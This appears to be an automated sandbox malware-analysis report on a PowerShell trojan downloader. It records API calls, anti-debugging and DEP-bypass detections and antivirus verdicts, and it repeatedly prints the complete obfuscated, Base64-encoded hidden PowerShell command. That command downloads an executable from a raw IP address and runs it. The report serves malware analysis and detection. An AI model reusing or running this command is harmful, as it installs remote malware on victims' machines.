NtProtectVirtualMemory Sept. 19, 2023, 6:05 p.m.	process_identifier: 2260 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fefdad1000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Sept. 19, 2023, 6:05 p.m.	process_identifier: 2260 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076b9a000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Sept. 19, 2023, 6:05 p.m.	process_identifier: 2260 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076bd2000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Sept. 19, 2023, 6:05 p.m.	process_identifier: 2260 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076c01000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Sept. 19, 2023, 6:05 p.m.	process_identifier: 2260 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076c01000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Sept. 19, 2023, 6:05 p.m.	process_identifier: 2260 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076c01000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Sept. 19, 2023, 6:05 p.m.	process_identifier: 2260 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076c01000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Sept. 19, 2023, 6:05 p.m.	process_identifier: 2260 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076c01000 process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Sept. 19, 2023, 6:04 p.m.	process_identifier: 2388 region_size: 135168 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00000000026a0000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Sept. 19, 2023, 6:04 p.m.	process_identifier: 2388 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00000000026c0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Sept. 19, 2023, 6:04 p.m.	process_identifier: 2388 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076c01000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Sept. 19, 2023, 6:04 p.m.	process_identifier: 2388 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076c01000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Sept. 19, 2023, 6:04 p.m.	process_identifier: 2388 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076c01000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Sept. 19, 2023, 6:04 p.m.	process_identifier: 2388 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076c01000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Sept. 19, 2023, 6:04 p.m.	process_identifier: 2388 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076c01000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Sept. 19, 2023, 6:04 p.m.	process_identifier: 2388 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076c01000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Sept. 19, 2023, 6:04 p.m.	process_identifier: 2388 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076bad000 process_handle: 0xffffffffffffffff	1

Creates a shortcut to an executable file (1 event)

file	C:\Users\test22\Desktop\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk

Creates a suspicious process (3 events)

cmdline	powerSHeLL.eXE -Ex BypaSS -nOP -w HIDden -Ec IAAgACAAIAAgACAAIAAgAFsATgBFAFQALgBTAEUAUgB2AGkAQwBFAFAAbwBJAE4AdABtAGEAbgBhAGcAZQBSAF0AOgA6AFMARQBDAHUAUgBpAFQAeQBQAFIAbwB0AE8AYwBPAEwAIAAgACAAIAAgACAAPQAgAAkACQAJAAkACQBbAE4ARQB0AC4AUwBlAEMAdQBSAGkAdAB5AFAAUgBvAHQATwBjAG8ATAB0AHkAUABlAF0AOgA6AFQAbABzADEAMgAgACAAIAAgAAkAOwAgAAkAIAAgACAACQAJAAkAIAAJAAkACQAJAAkACQAgACAAVwBHAEUAVAAgAAkACQAJACAAKABbAGMAaABhAFIAXQAgAAkAMQAwADQAIAAJACAACQArACAACQBbAEMASABhAFIAXQAgAAkAMQAxADYAIAAJACAACQArACAACQBbAEMAaABBAFIAXQAgAAkAMQAxADYAIAAJACAACQArACAACQBbAGMASABhAHIAXQAgAAkAMQAxADIAIAAJACAACQArACAACQBbAGMAaABBAHIAXQAgAAkANQA4ACAACQAgAAkAKwAgAAkAWwBDAEgAQQBSAF0AIAAJADQANwAgAAkAIAAJACsAIAAJAFsAYwBIAGEAcgBdACAACQA0ADcAIAAJACAACQArACAACQBbAGMAaABBAHIAXQAgAAkANAA5ACAACQAgAAkAKwAgAAkAWwBjAEgAQQBSAF0AIAAJADQAOAAgAAkAIAAJACsAIAAJAFsAQwBoAGEAUgBdACAACQA1ADEAIAAJACAACQArACAACQBbAEMASABBAHIAXQAgAAkANAA2ACAACQAgAAkAKwAgAAkAWwBjAEgAQQBSAF0AIAAJADQAOQAgAAkAIAAJACsAIAAJAFsAYwBIAGEAUgBdACAACQA1ADYAIAAJACAACQArACAACQBbAEMAaABBAFIAXQAgAAkANQAwACAACQAgAAkAKwAgAAkAWwBjAGgAQQByAF0AIAAJADQANgAgAAkAIAAJACsAIAAJAFsAYwBIAEEAcgBdACAACQA0ADkAIAAJACAACQArACAACQBbAGMASABhAHIAXQAgAAkANQA0ACAACQAgAAkAKwAgAAkAWwBDAEgAYQByAF0AIAAJADQANgAgAAkAIAAJACsAIAAJAFsAYwBoAGEAcgBdACAACQA1ADAAIAAJACAACQArACAACQBbAGMAaABBAFIAXQAgAAkANQAxACAACQAgAAkAKwAgAAkAWwBjAGgAQQBSAF0AIAAJADQANwAgAAkAIAAJACsAIAAJAFsAQwBoAEEAcgBdACAACQA4ADMAIAAJACAACQArACAACQBbAEMAaABhAHIAXQAgAAkANAA5ACAACQAgAAkAKwAgAAkAWwBjAGgAQQBSAF0AIAAJADUANQAgAAkAIAAJACsAIAAJAFsAYwBoAEEAcgBdACAACQA1ADcAIAAJACAACQArACAACQBbAEMAaABBAFIAXQAgAAkANwA3ACAACQAgAAkAKwAgAAkAWwBjAEgAQQBSAF0AIAAJADQANwAgAAkAIAAJACsAIAAJAFsAYwBIAEEAcgBdACAACQAxADEANQAgAAkAIAAJACsAIAAJAFsAYwBoAGEAUgBdACAACQAxADAAOQAgAAkAIAAJACsAIAAJAFsAQwBIAEEAcgBdACAACQAxADEANQAgAAkAIAAJACsAIAAJAFsAQwBIAGEAcgBdACAACQAxADEANQAgAAkAIAAJACsAIAAJAFsAYwBoAEEAUgBdACAACQA0ADYAIAAJACAACQArACAACQBbAGMASABhAFIAXQAgAAkAMQAwADEAIAAJACAACQArACAACQBbAEMASABhAFIAXQAgAAkAMQAyADAAIAAJACAACQArACAACQBbAGMAaABhAFIAXQAgAAkAMQAwADEAIAAJACkAIAAgAAkACQAgAAkAIAAJAC0AbwB1AFQAZgBpAEwAZQAgAAkACQAJAB0gJABlAE4AdgA6AGEAcABQAEQAYQBUAEEAXABUAGkAVwBvAHIAawBlAHIALgBlAHgAZQAdICAACQAJAAkACQAJACAAIAAJAAkACQAJAAkACQAJAAkAOwAgACAAUwB0AGEAUgB0ACAACQAJAAkAIAAJAAkAIAAJAAkACQAgACAACQAJACAAHSAkAEUATgBWADoAYQBwAFAAZABhAHQAQQBcAFQAaQBXAG8AcgBrAGUAcgAuAGUAeABlAB0g "
cmdline	C:\Windows\System32\cmd.exe "/c powerSHeLL.eXE -Ex BypaSS -nOP -w HIDden -Ec IAAgACAAIAAgACAAIAAgAFsATgBFAFQALgBTAEUAUgB2AGkAQwBFAFAAbwBJAE4AdABtAGEAbgBhAGcAZQBSAF0AOgA6AFMARQBDAHUAUgBpAFQAeQBQAFIAbwB0AE8AYwBPAEwAIAAgACAAIAAgACAAPQAgAAkACQAJAAkACQBbAE4ARQB0AC4AUwBlAEMAdQBSAGkAdAB5AFAAUgBvAHQATwBjAG8ATAB0AHkAUABlAF0AOgA6AFQAbABzADEAMgAgACAAIAAgAAkAOwAgAAkAIAAgACAACQAJAAkAIAAJAAkACQAJAAkACQAgACAAVwBHAEUAVAAgAAkACQAJACAAKABbAGMAaABhAFIAXQAgAAkAMQAwADQAIAAJACAACQArACAACQBbAEMASABhAFIAXQAgAAkAMQAxADYAIAAJACAACQArACAACQBbAEMAaABBAFIAXQAgAAkAMQAxADYAIAAJACAACQArACAACQBbAGMASABhAHIAXQAgAAkAMQAxADIAIAAJACAACQArACAACQBbAGMAaABBAHIAXQAgAAkANQA4ACAACQAgAAkAKwAgAAkAWwBDAEgAQQBSAF0AIAAJADQANwAgAAkAIAAJACsAIAAJAFsAYwBIAGEAcgBdACAACQA0ADcAIAAJACAACQArACAACQBbAGMAaABBAHIAXQAgAAkANAA5ACAACQAgAAkAKwAgAAkAWwBjAEgAQQBSAF0AIAAJADQAOAAgAAkAIAAJACsAIAAJAFsAQwBoAGEAUgBdACAACQA1ADEAIAAJACAACQArACAACQBbAEMASABBAHIAXQAgAAkANAA2ACAACQAgAAkAKwAgAAkAWwBjAEgAQQBSAF0AIAAJADQAOQAgAAkAIAAJACsAIAAJAFsAYwBIAGEAUgBdACAACQA1ADYAIAAJACAACQArACAACQBbAEMAaABBAFIAXQAgAAkANQAwACAACQAgAAkAKwAgAAkAWwBjAGgAQQByAF0AIAAJADQANgAgAAkAIAAJACsAIAAJAFsAYwBIAEEAcgBdACAACQA0ADkAIAAJACAACQArACAACQBbAGMASABhAHIAXQAgAAkANQA0ACAACQAgAAkAKwAgAAkAWwBDAEgAYQByAF0AIAAJADQANgAgAAkAIAAJACsAIAAJAFsAYwBoAGEAcgBdACAACQA1ADAAIAAJACAACQArACAACQBbAGMAaABBAFIAXQAgAAkANQAxACAACQAgAAkAKwAgAAkAWwBjAGgAQQBSAF0AIAAJADQANwAgAAkAIAAJACsAIAAJAFsAQwBoAEEAcgBdACAACQA4ADMAIAAJACAACQArACAACQBbAEMAaABhAHIAXQAgAAkANAA5ACAACQAgAAkAKwAgAAkAWwBjAGgAQQBSAF0AIAAJADUANQAgAAkAIAAJACsAIAAJAFsAYwBoAEEAcgBdACAACQA1ADcAIAAJACAACQArACAACQBbAEMAaABBAFIAXQAgAAkANwA3ACAACQAgAAkAKwAgAAkAWwBjAEgAQQBSAF0AIAAJADQANwAgAAkAIAAJACsAIAAJAFsAYwBIAEEAcgBdACAACQAxADEANQAgAAkAIAAJACsAIAAJAFsAYwBoAGEAUgBdACAACQAxADAAOQAgAAkAIAAJACsAIAAJAFsAQwBIAEEAcgBdACAACQAxADEANQAgAAkAIAAJACsAIAAJAFsAQwBIAGEAcgBdACAACQAxADEANQAgAAkAIAAJACsAIAAJAFsAYwBoAEEAUgBdACAACQA0ADYAIAAJACAACQArACAACQBbAGMASABhAFIAXQAgAAkAMQAwADEAIAAJACAACQArACAACQBbAEMASABhAFIAXQAgAAkAMQAyADAAIAAJACAACQArACAACQBbAGMAaABhAFIAXQAgAAkAMQAwADEAIAAJACkAIAAgAAkACQAgAAkAIAAJAC0AbwB1AFQAZgBpAEwAZQAgAAkACQAJAB0gJABlAE4AdgA6AGEAcABQAEQAYQBUAEEAXABUAGkAVwBvAHIAawBlAHIALgBlAHgAZQAdICAACQAJAAkACQAJACAAIAAJAAkACQAJAAkACQAJAAkAOwAgACAAUwB0AGEAUgB0ACAACQAJAAkAIAAJAAkAIAAJAAkACQAgACAACQAJACAAHSAkAEUATgBWADoAYQBwAFAAZABhAHQAQQBcAFQAaQBXAG8AcgBrAGUAcgAuAGUAeABlAB0g "
cmdline	"C:\Windows\system32\cmd.exe" "/c powerSHeLL.eXE -Ex BypaSS -nOP -w HIDden -Ec IAAgACAAIAAgACAAIAAgAFsATgBFAFQALgBTAEUAUgB2AGkAQwBFAFAAbwBJAE4AdABtAGEAbgBhAGcAZQBSAF0AOgA6AFMARQBDAHUAUgBpAFQAeQBQAFIAbwB0AE8AYwBPAEwAIAAgACAAIAAgACAAPQAgAAkACQAJAAkACQBbAE4ARQB0AC4AUwBlAEMAdQBSAGkAdAB5AFAAUgBvAHQATwBjAG8ATAB0AHkAUABlAF0AOgA6AFQAbABzADEAMgAgACAAIAAgAAkAOwAgAAkAIAAgACAACQAJAAkAIAAJAAkACQAJAAkACQAgACAAVwBHAEUAVAAgAAkACQAJACAAKABbAGMAaABhAFIAXQAgAAkAMQAwADQAIAAJACAACQArACAACQBbAEMASABhAFIAXQAgAAkAMQAxADYAIAAJACAACQArACAACQBbAEMAaABBAFIAXQAgAAkAMQAxADYAIAAJACAACQArACAACQBbAGMASABhAHIAXQAgAAkAMQAxADIAIAAJACAACQArACAACQBbAGMAaABBAHIAXQAgAAkANQA4ACAACQAgAAkAKwAgAAkAWwBDAEgAQQBSAF0AIAAJADQANwAgAAkAIAAJACsAIAAJAFsAYwBIAGEAcgBdACAACQA0ADcAIAAJACAACQArACAACQBbAGMAaABBAHIAXQAgAAkANAA5ACAACQAgAAkAKwAgAAkAWwBjAEgAQQBSAF0AIAAJADQAOAAgAAkAIAAJACsAIAAJAFsAQwBoAGEAUgBdACAACQA1ADEAIAAJACAACQArACAACQBbAEMASABBAHIAXQAgAAkANAA2ACAACQAgAAkAKwAgAAkAWwBjAEgAQQBSAF0AIAAJADQAOQAgAAkAIAAJACsAIAAJAFsAYwBIAGEAUgBdACAACQA1ADYAIAAJACAACQArACAACQBbAEMAaABBAFIAXQAgAAkANQAwACAACQAgAAkAKwAgAAkAWwBjAGgAQQByAF0AIAAJADQANgAgAAkAIAAJACsAIAAJAFsAYwBIAEEAcgBdACAACQA0ADkAIAAJACAACQArACAACQBbAGMASABhAHIAXQAgAAkANQA0ACAACQAgAAkAKwAgAAkAWwBDAEgAYQByAF0AIAAJADQANgAgAAkAIAAJACsAIAAJAFsAYwBoAGEAcgBdACAACQA1ADAAIAAJACAACQArACAACQBbAGMAaABBAFIAXQAgAAkANQAxACAACQAgAAkAKwAgAAkAWwBjAGgAQQBSAF0AIAAJADQANwAgAAkAIAAJACsAIAAJAFsAQwBoAEEAcgBdACAACQA4ADMAIAAJACAACQArACAACQBbAEMAaABhAHIAXQAgAAkANAA5ACAACQAgAAkAKwAgAAkAWwBjAGgAQQBSAF0AIAAJADUANQAgAAkAIAAJACsAIAAJAFsAYwBoAEEAcgBdACAACQA1ADcAIAAJACAACQArACAACQBbAEMAaABBAFIAXQAgAAkANwA3ACAACQAgAAkAKwAgAAkAWwBjAEgAQQBSAF0AIAAJADQANwAgAAkAIAAJACsAIAAJAFsAYwBIAEEAcgBdACAACQAxADEANQAgAAkAIAAJACsAIAAJAFsAYwBoAGEAUgBdACAACQAxADAAOQAgAAkAIAAJACsAIAAJAFsAQwBIAEEAcgBdACAACQAxADEANQAgAAkAIAAJACsAIAAJAFsAQwBIAGEAcgBdACAACQAxADEANQAgAAkAIAAJACsAIAAJAFsAYwBoAEEAUgBdACAACQA0ADYAIAAJACAACQArACAACQBbAGMASABhAFIAXQAgAAkAMQAwADEAIAAJACAACQArACAACQBbAEMASABhAFIAXQAgAAkAMQAyADAAIAAJACAACQArACAACQBbAGMAaABhAFIAXQAgAAkAMQAwADEAIAAJACkAIAAgAAkACQAgAAkAIAAJAC0AbwB1AFQAZgBpAEwAZQAgAAkACQAJAB0gJABlAE4AdgA6AGEAcABQAEQAYQBUAEEAXABUAGkAVwBvAHIAawBlAHIALgBlAHgAZQAdICAACQAJAAkACQAJACAAIAAJAAkACQAJAAkACQAJAAkAOwAgACAAUwB0AGEAUgB0ACAACQAJAAkAIAAJAAkAIAAJAAkACQAgACAACQAJACAAHSAkAEUATgBWADoAYQBwAFAAZABhAHQAQQBcAFQAaQBXAG8AcgBrAGUAcgAuAGUAeABlAB0g "

A process created a hidden window (1 event)

Time & API	Arguments	Status	Return	Repeated
ShellExecuteExW Sept. 19, 2023, 6:04 p.m.	show_type: 0 filepath_r: C:\Windows\system32\cmd.exe parameters: "/c powerSHeLL.eXE -Ex BypaSS -nOP -w HIDden -Ec IAAgACAAIAAgACAAIAAgAFsATgBFAFQALgBTAEUAUgB2AGkAQwBFAFAAbwBJAE4AdABtAGEAbgBhAGcAZQBSAF0AOgA6AFMARQBDAHUAUgBpAFQAeQBQAFIAbwB0AE8AYwBPAEwAIAAgACAAIAAgACAAPQAgAAkACQAJAAkACQBbAE4ARQB0AC4AUwBlAEMAdQBSAGkAdAB5AFAAUgBvAHQATwBjAG8ATAB0AHkAUABlAF0AOgA6AFQAbABzADEAMgAgACAAIAAgAAkAOwAgAAkAIAAgACAACQAJAAkAIAAJAAkACQAJAAkACQAgACAAVwBHAEUAVAAgAAkACQAJACAAKABbAGMAaABhAFIAXQAgAAkAMQAwADQAIAAJACAACQArACAACQBbAEMASABhAFIAXQAgAAkAMQAxADYAIAAJACAACQArACAACQBbAEMAaABBAFIAXQAgAAkAMQAxADYAIAAJACAACQArACAACQBbAGMASABhAHIAXQAgAAkAMQAxADIAIAAJACAACQArACAACQBbAGMAaABBAHIAXQAgAAkANQA4ACAACQAgAAkAKwAgAAkAWwBDAEgAQQBSAF0AIAAJADQANwAgAAkAIAAJACsAIAAJAFsAYwBIAGEAcgBdACAACQA0ADcAIAAJACAACQArACAACQBbAGMAaABBAHIAXQAgAAkANAA5ACAACQAgAAkAKwAgAAkAWwBjAEgAQQBSAF0AIAAJADQAOAAgAAkAIAAJACsAIAAJAFsAQwBoAGEAUgBdACAACQA1ADEAIAAJACAACQArACAACQBbAEMASABBAHIAXQAgAAkANAA2ACAACQAgAAkAKwAgAAkAWwBjAEgAQQBSAF0AIAAJADQAOQAgAAkAIAAJACsAIAAJAFsAYwBIAGEAUgBdACAACQA1ADYAIAAJACAACQArACAACQBbAEMAaABBAFIAXQAgAAkANQAwACAACQAgAAkAKwAgAAkAWwBjAGgAQQByAF0AIAAJADQANgAgAAkAIAAJACsAIAAJAFsAYwBIAEEAcgBdACAACQA0ADkAIAAJACAACQArACAACQBbAGMASABhAHIAXQAgAAkANQA0ACAACQAgAAkAKwAgAAkAWwBDAEgAYQByAF0AIAAJADQANgAgAAkAIAAJACsAIAAJAFsAYwBoAGEAcgBdACAACQA1ADAAIAAJACAACQArACAACQBbAGMAaABBAFIAXQAgAAkANQAxACAACQAgAAkAKwAgAAkAWwBjAGgAQQBSAF0AIAAJADQANwAgAAkAIAAJACsAIAAJAFsAQwBoAEEAcgBdACAACQA4ADMAIAAJACAACQArACAACQBbAEMAaABhAHIAXQAgAAkANAA5ACAACQAgAAkAKwAgAAkAWwBjAGgAQQBSAF0AIAAJADUANQAgAAkAIAAJACsAIAAJAFsAYwBoAEEAcgBdACAACQA1ADcAIAAJACAACQArACAACQBbAEMAaABBAFIAXQAgAAkANwA3ACAACQAgAAkAKwAgAAkAWwBjAEgAQQBSAF0AIAAJADQANwAgAAkAIAAJACsAIAAJAFsAYwBIAEEAcgBdACAACQAxADEANQAgAAkAIAAJACsAIAAJAFsAYwBoAGEAUgBdACAACQAxADAAOQAgAAkAIAAJACsAIAAJAFsAQwBIAEEAcgBdACAACQAxADEANQAgAAkAIAAJACsAIAAJAFsAQwBIAGEAcgBdACAACQAxADEANQAgAAkAIAAJACsAIAAJAFsAYwBoAEEAUgBdACAACQA0ADYAIAAJACAACQArACAACQBbAGMASABhAFIAXQAgAAkAMQAwADEAIAAJACAACQArACAACQBbAEMASABhAFIAXQAgAAkAMQAyADAAIAAJACAACQArACAACQBbAGMAaABhAFIAXQAgAAkAMQAwADEAIAAJACkAIAAgAAkACQAgAAkAIAAJAC0AbwB1AFQAZgBpAEwAZQAgAAkACQAJAB0gJABlAE4AdgA6AGEAcABQAEQAYQBUAEEAXABUAGkAVwBvAHIAawBlAHIALgBlAHgAZQAdICAACQAJAAkACQAJACAAIAAJAAkACQAJAAkACQAJAAkAOwAgACAAUwB0AGEAUgB0ACAACQAJAAkAIAAJAAkAIAAJAAkACQAgACAACQAJACAAHSAkAEUATgBWADoAYQBwAFAAZABhAHQAQQBcAFQAaQBXAG8AcgBrAGUAcgAuAGUAeABlAB0g " filepath: C:\Windows\System32\cmd.exe	1	1	0

Changes read-write memory protection to read-execute (probably to avoid detection when setting all RWX flags at the same time) (1 event)

Time & API	Arguments	Status	Return	Repeated
NtProtectVirtualMemory Sept. 19, 2023, 6:05 p.m.	process_identifier: 2388 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 32 (PAGE_EXECUTE_READ) base_address: 0x000007fffff80000 process_handle: 0xffffffffffffffff	1	0	0

Checks for the Locally Unique Identifier on the system for a suspicious privilege (1 event)

Time & API	Arguments	Status	Return	Repeated
LookupPrivilegeValueW Sept. 19, 2023, 6:04 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0

Yara rule detected in process memory (8 events)

description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep

Uses Windows utilities for basic Windows functionality (1 event)

cmdline

"C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:2260 CREDAT:145409

File has been identified by 13 AntiVirus engines on VirusTotal as malicious (13 events)

Cyren	VBS/Downldr.HP!Camelot
ESET-NOD32	PowerShell/TrojanDownloader.Agent.DDN
Avast	Script:SNH-gen [Trj]
Kaspersky	HEUR:Trojan.Script.Alien.gen
Tencent	Win32.Trojan-Downloader.Downloader.Wimw
Emsisoft	Trojan.GenericKD.69347858 (B)
Baidu	VBS.Trojan-Downloader.Agent.ul
FireEye	Trojan.GenericKD.69347858
ZoneAlarm	HEUR:Trojan.Script.Alien.gen
Google	Detected
Rising	Downloader.Agent/PS!8.1250D (TOPIS:E0:9PfU41G0ItH)
Fortinet	VBS/Agent.BB79!tr.dldr
AVG	Script:SNH-gen [Trj]

One or more non-whitelisted processes were created (3 events)

parent_process	iexplore.exe	martian_process	C:\Windows\System32\cmd.exe "/c powerSHeLL.eXE -Ex BypaSS -nOP -w HIDden -Ec IAAgACAAIAAgACAAIAAgAFsATgBFAFQALgBTAEUAUgB2AGkAQwBFAFAAbwBJAE4AdABtAGEAbgBhAGcAZQBSAF0AOgA6AFMARQBDAHUAUgBpAFQAeQBQAFIAbwB0AE8AYwBPAEwAIAAgACAAIAAgACAAPQAgAAkACQAJAAkACQBbAE4ARQB0AC4AUwBlAEMAdQBSAGkAdAB5AFAAUgBvAHQATwBjAG8ATAB0AHkAUABlAF0AOgA6AFQAbABzADEAMgAgACAAIAAgAAkAOwAgAAkAIAAgACAACQAJAAkAIAAJAAkACQAJAAkACQAgACAAVwBHAEUAVAAgAAkACQAJACAAKABbAGMAaABhAFIAXQAgAAkAMQAwADQAIAAJACAACQArACAACQBbAEMASABhAFIAXQAgAAkAMQAxADYAIAAJACAACQArACAACQBbAEMAaABBAFIAXQAgAAkAMQAxADYAIAAJACAACQArACAACQBbAGMASABhAHIAXQAgAAkAMQAxADIAIAAJACAACQArACAACQBbAGMAaABBAHIAXQAgAAkANQA4ACAACQAgAAkAKwAgAAkAWwBDAEgAQQBSAF0AIAAJADQANwAgAAkAIAAJACsAIAAJAFsAYwBIAGEAcgBdACAACQA0ADcAIAAJACAACQArACAACQBbAGMAaABBAHIAXQAgAAkANAA5ACAACQAgAAkAKwAgAAkAWwBjAEgAQQBSAF0AIAAJADQAOAAgAAkAIAAJACsAIAAJAFsAQwBoAGEAUgBdACAACQA1ADEAIAAJACAACQArACAACQBbAEMASABBAHIAXQAgAAkANAA2ACAACQAgAAkAKwAgAAkAWwBjAEgAQQBSAF0AIAAJADQAOQAgAAkAIAAJACsAIAAJAFsAYwBIAGEAUgBdACAACQA1ADYAIAAJACAACQArACAACQBbAEMAaABBAFIAXQAgAAkANQAwACAACQAgAAkAKwAgAAkAWwBjAGgAQQByAF0AIAAJADQANgAgAAkAIAAJACsAIAAJAFsAYwBIAEEAcgBdACAACQA0ADkAIAAJACAACQArACAACQBbAGMASABhAHIAXQAgAAkANQA0ACAACQAgAAkAKwAgAAkAWwBDAEgAYQByAF0AIAAJADQANgAgAAkAIAAJACsAIAAJAFsAYwBoAGEAcgBdACAACQA1ADAAIAAJACAACQArACAACQBbAGMAaABBAFIAXQAgAAkANQAxACAACQAgAAkAKwAgAAkAWwBjAGgAQQBSAF0AIAAJADQANwAgAAkAIAAJACsAIAAJAFsAQwBoAEEAcgBdACAACQA4ADMAIAAJACAACQArACAACQBbAEMAaABhAHIAXQAgAAkANAA5ACAACQAgAAkAKwAgAAkAWwBjAGgAQQBSAF0AIAAJADUANQAgAAkAIAAJACsAIAAJAFsAYwBoAEEAcgBdACAACQA1ADcAIAAJACAACQArACAACQBbAEMAaABBAFIAXQAgAAkANwA3ACAACQAgAAkAKwAgAAkAWwBjAEgAQQBSAF0AIAAJADQANwAgAAkAIAAJACsAIAAJAFsAYwBIAEEAcgBdACAACQAxADEANQAgAAkAIAAJACsAIAAJAFsAYwBoAGEAUgBdACAACQAxADAAOQAgAAkAIAAJACsAIAAJAFsAQwBIAEEAcgBdACAACQAxADEANQAgAAkAIAAJACsAIAAJAFsAQwBIAGEAcgBdACAACQAxADEANQAgAAkAIAAJACsAIAAJAFsAYwBoAEEAUgBdACAACQA0ADYAIAAJACAACQArACAACQBbAGMASABhAFIAXQAgAAkAMQAwADEAIAAJACAACQArACAACQBbAEMASABhAFIAXQAgAAkAMQAyADAAIAAJACAACQArACAACQBbAGMAaABhAFIAXQAgAAkAMQAwADEAIAAJACkAIAAgAAkACQAgAAkAIAAJAC0AbwB1AFQAZgBpAEwAZQAgAAkACQAJAB0gJABlAE4AdgA6AGEAcABQAEQAYQBUAEEAXABUAGkAVwBvAHIAawBlAHIALgBlAHgAZQAdICAACQAJAAkACQAJACAAIAAJAAkACQAJAAkACQAJAAkAOwAgACAAUwB0AGEAUgB0ACAACQAJAAkAIAAJAAkAIAAJAAkACQAgACAACQAJACAAHSAkAEUATgBWADoAYQBwAFAAZABhAHQAQQBcAFQAaQBXAG8AcgBrAGUAcgAuAGUAeABlAB0g "
parent_process	iexplore.exe	martian_process	"C:\Windows\system32\cmd.exe" "/c powerSHeLL.eXE -Ex BypaSS -nOP -w HIDden -Ec IAAgACAAIAAgACAAIAAgAFsATgBFAFQALgBTAEUAUgB2AGkAQwBFAFAAbwBJAE4AdABtAGEAbgBhAGcAZQBSAF0AOgA6AFMARQBDAHUAUgBpAFQAeQBQAFIAbwB0AE8AYwBPAEwAIAAgACAAIAAgACAAPQAgAAkACQAJAAkACQBbAE4ARQB0AC4AUwBlAEMAdQBSAGkAdAB5AFAAUgBvAHQATwBjAG8ATAB0AHkAUABlAF0AOgA6AFQAbABzADEAMgAgACAAIAAgAAkAOwAgAAkAIAAgACAACQAJAAkAIAAJAAkACQAJAAkACQAgACAAVwBHAEUAVAAgAAkACQAJACAAKABbAGMAaABhAFIAXQAgAAkAMQAwADQAIAAJACAACQArACAACQBbAEMASABhAFIAXQAgAAkAMQAxADYAIAAJACAACQArACAACQBbAEMAaABBAFIAXQAgAAkAMQAxADYAIAAJACAACQArACAACQBbAGMASABhAHIAXQAgAAkAMQAxADIAIAAJACAACQArACAACQBbAGMAaABBAHIAXQAgAAkANQA4ACAACQAgAAkAKwAgAAkAWwBDAEgAQQBSAF0AIAAJADQANwAgAAkAIAAJACsAIAAJAFsAYwBIAGEAcgBdACAACQA0ADcAIAAJACAACQArACAACQBbAGMAaABBAHIAXQAgAAkANAA5ACAACQAgAAkAKwAgAAkAWwBjAEgAQQBSAF0AIAAJADQAOAAgAAkAIAAJACsAIAAJAFsAQwBoAGEAUgBdACAACQA1ADEAIAAJACAACQArACAACQBbAEMASABBAHIAXQAgAAkANAA2ACAACQAgAAkAKwA